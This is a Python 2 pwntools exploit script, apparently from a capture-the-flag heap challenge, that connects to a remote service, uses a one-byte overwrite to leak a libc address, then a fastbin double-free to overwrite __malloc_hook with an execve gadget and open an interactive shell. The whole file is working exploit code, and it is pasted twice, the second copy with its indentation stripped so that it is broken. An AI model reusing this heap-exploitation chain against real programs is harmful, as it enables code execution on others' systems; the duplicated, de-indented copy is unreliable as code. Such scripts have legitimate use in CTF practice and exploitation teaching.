jjluczyn/papify2.py

## papify2.py
#!/usr/bin/env python2

from pwn import *

context.arch = 'amd64'
BINARY = './chall'
HOST, PORT = 'ctf.h-c0n.com', 60003

#elf = ELF(BINARY)
libc = ELF('./libc-cont.so')
#def debug(breakpoints):
##    script = ""
#    for bp in breakpoints:
#        script += "b *0x%x\n"%(bp)
#    gdb.attach(p,gdbscript=script)

# Application logic

#def initialize(answer):
##    p.recv()
#    p.send(answer)

context.log_level = 'debug'

def add(index, size, content):
    p.sendlineafter('>> ', '1')
    p.sendlineafter('Paper\'s index: ', str(index))
    p.sendlineafter('Paper\'s size: ', str(size))
    p.sendlineafter('Paper\'s content: ', content)

def show(index):
    p.sendlineafter('>> ', '4')
    p.sendlineafter('Paper\'s index: ', str(index))

def free(index):
    p.sendlineafter('>> ', '3')
    p.sendlineafter('Paper\'s index: ', str(index))

def start():
    if not args.REMOTE:
    	return process(BINARY)
    else:
    	return remote(HOST, PORT)

def fix_typo(index, pos, char):
    p.sendlineafter('>> ', '2')
    p.sendlineafter('Paper\'s index: ', str(index))
    p.sendlineafter('Which typo do you want to fix?: ', str(pos))
    p.sendlineafter('Fix\'s content: ', char)

p = start()
#if not args.REMOTE and args.GDB:
#    debug([])

for i in range(7):
	add(2, 128, "7"*128)
	free(2)

add(0, 24, "A"*24)
add(1, 128, "B"*128)
add(2, 24, "C"*24)
free(1)
fix_typo(0, 24, '\x93')
add(1, 128, "d"*7 + "\n")

p.sendlineafter('>> ', '4')
p.sendlineafter('Paper\'s index: ', "1")
p.recvuntil('d' * 7 + '\n')
leak = p.recv(6) + '\x00\x00'


libcDir = u64(leak) -1985546

fakechunk = u64(leak) + 3
fakechunkFree = u64(leak) + 10635
system = libcDir + 290800
execve_addr = libcDir + 0x106ef8

for i in range(7):
	add(2, 96, "R"*96)
	free(2)

add(0, 96, "S"*96)
add(1, 96, "T"*96)
free(0)
free(1)
free(0)
add(1, 96, p64(fakechunk) + "U"*88)
add(1, 96, "X"*96)
add(1, 96, "Y"*96)
add(0,96, 'i' * 19 + p64(execve_addr) + "\x00"*20)
print u64(leak)
print libc.symbols['__malloc_hook']
p.interactive()

add(2,1,'\n')
	#!/usr/bin/env python2

	from pwn import *

	context.arch = 'amd64'
	BINARY = './chall'
	HOST, PORT = 'ctf.h-c0n.com', 60003

	#elf = ELF(BINARY)
	libc = ELF('./libc-cont.so')
	#def debug(breakpoints):
	## script = ""
	# for bp in breakpoints:
	# script += "b *0x%x\n"%(bp)
	# gdb.attach(p,gdbscript=script)

	# Application logic

	#def initialize(answer):
	## p.recv()
	# p.send(answer)

	context.log_level = 'debug'

	def add(index, size, content):
	p.sendlineafter('>> ', '1')
	p.sendlineafter('Paper\'s index: ', str(index))
	p.sendlineafter('Paper\'s size: ', str(size))
	p.sendlineafter('Paper\'s content: ', content)

	def show(index):
	p.sendlineafter('>> ', '4')
	p.sendlineafter('Paper\'s index: ', str(index))

	def free(index):
	p.sendlineafter('>> ', '3')
	p.sendlineafter('Paper\'s index: ', str(index))

	def start():
	if not args.REMOTE:
	return process(BINARY)
	else:
	return remote(HOST, PORT)

	def fix_typo(index, pos, char):
	p.sendlineafter('>> ', '2')
	p.sendlineafter('Paper\'s index: ', str(index))
	p.sendlineafter('Which typo do you want to fix?: ', str(pos))
	p.sendlineafter('Fix\'s content: ', char)

	p = start()
	#if not args.REMOTE and args.GDB:
	# debug([])

	for i in range(7):
	add(2, 128, "7"*128)
	free(2)

	add(0, 24, "A"*24)
	add(1, 128, "B"*128)
	add(2, 24, "C"*24)
	free(1)
	fix_typo(0, 24, '\x93')
	add(1, 128, "d"*7 + "\n")

	p.sendlineafter('>> ', '4')
	p.sendlineafter('Paper\'s index: ', "1")
	p.recvuntil('d' * 7 + '\n')
	leak = p.recv(6) + '\x00\x00'


	libcDir = u64(leak) -1985546

	fakechunk = u64(leak) + 3
	fakechunkFree = u64(leak) + 10635
	system = libcDir + 290800
	execve_addr = libcDir + 0x106ef8

	for i in range(7):
	add(2, 96, "R"*96)
	free(2)

	add(0, 96, "S"*96)
	add(1, 96, "T"*96)
	free(0)
	free(1)
	free(0)
	add(1, 96, p64(fakechunk) + "U"*88)
	add(1, 96, "X"*96)
	add(1, 96, "Y"*96)
	add(0,96, 'i' * 19 + p64(execve_addr) + "\x00"*20)
	print u64(leak)
	print libc.symbols['__malloc_hook']
	p.interactive()

	add(2,1,'\n')